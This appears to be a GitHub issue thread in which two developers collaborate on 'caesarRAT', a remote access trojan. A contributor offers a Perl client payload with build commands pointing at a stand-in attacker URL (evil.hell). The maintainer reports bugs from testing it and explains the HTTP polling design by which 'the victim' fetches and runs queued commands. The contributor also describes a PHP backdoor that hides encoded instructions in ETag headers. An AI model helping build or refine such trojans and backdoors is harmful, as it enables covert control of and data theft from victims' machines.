Add Perl client

[gottburgm]

Hello again !

I installed and tried your RAT all was fine except one thing ... i hate python and the generated client payload was in python 😃 So i made an equivalent in perl. Let me know if you are interested by it and i will create a repo on my git with the file. I will also have a look at pp packager and if i have time i will make a generator.

[gottburgm]

Forked Repository

caesarRAT

Perl Payload Builder

• Instructions

   git clone https://github.com/gottburgm/caesarRAT caesarRAT-forked
   cd caesarRAT-forked 
   sh install.sh
   cd Client
   perl builder.pl perl_payload http://evil.hell/caesar_install/

• client.py <=> outputs/perl_payload.pl

  • NOTE: set the DEBUG variable as 1 to see some usefull informations logged into debug.log

• client.exe <=> outputs/perl_payload

[0blio]

Nice work! Thank you. One of the goals of the project is to "translate" the payload in more languages as possibile.
I just tested your perl payload and it works great apart from a few small problems.

1. When I try to change directory via cd the payload change correctly the directory but return the following output to the server:
   Warning: Couldn't Move To : <directory_name_here>

2. When I try to start a blocking process like xcalc the perl payload wait until the calc is not closed.
   It should spawn a subprocess with the calc and add it to a list of subprocesses.

For the rest it works perfectly, compliments. I'll add it to the main project once it will be fixed.
My objective would be to create a unique generator that allow to select the type of payload, the language, the delay etc.

[gottburgm]

Thank's for the feedbacks ! The first bug will be fixed today and for the second one i will need to look how to handle this, because the python way to manage process is totally different than the perl one that i usually use but i will find something ;) keep you aware !

[0blio]

Any update?

[gottburgm]

in fact i fixed the first bug in few seconds yesterday but i forgot to commit hahahahaha. The second problem is really more problematic. Tried some stuff but it was really not stable.. There is also a major problem i think. Actually the number of requests done with the python client is crazy and with the perl, less requests but still to much. The second problem that i have is the database stuff. The RAT is way to slow. Because we are sending plaintext data, and we store it each time and read the database each time . I made a backdooring tool wich give you a fake shell and send the commands to a php backdoor file. It was hard and i avoided the storing feature because its too big. i was passing encoded instructions trough ETag http header and store all the outputs in files that i could read or download. but i made many precoded function to be able to have something usable. What do you think ?

[0blio]

The database is the only way to keep track of the user history (input, output, datetime of the request, datetime of the response and many more).
In the future the target history will be exportable in a convenient dump in order to allow local analysis, so I think the database is important.

Caesar can be slow because HTTP is stateless. We're not connected directly via socket so, in order to make the target to execute a command, we have to:

1. Insert our request in the database
2. Wait that the victim requests new commands to execute from the server (the requests in the pseudo-shell mode are performed once per second, else once every 10 second)
3. Wait that the victim execute the command
4. Wait that the victim respond to the server (based on the internet connection speed of the target)

So the average response time is 2 or 3 second.
Most of the free web-services doesn't support sockets and don't let you open ports, so an HTTP implementation was the only possibile thing to do.

I'm curious to see your backdooring tool, commit it if you want. I will give it a look.
Soon I'm also gonna test the new perl shell (with cd fix).

[gottburgm]

yeah i see let me think about it . because there are some other ways to make it faster. i will commit in 1 hour (i need to finish my raid in World Of Warcraft kek)

[gottburgm]

Commited ! There was a major stupid bug that removed the separator ("") as it was considered as a replacement var by the builder......

gottburgm/caesarRAT

[0blio]

Ok! I'm gonna test it in a few hours :)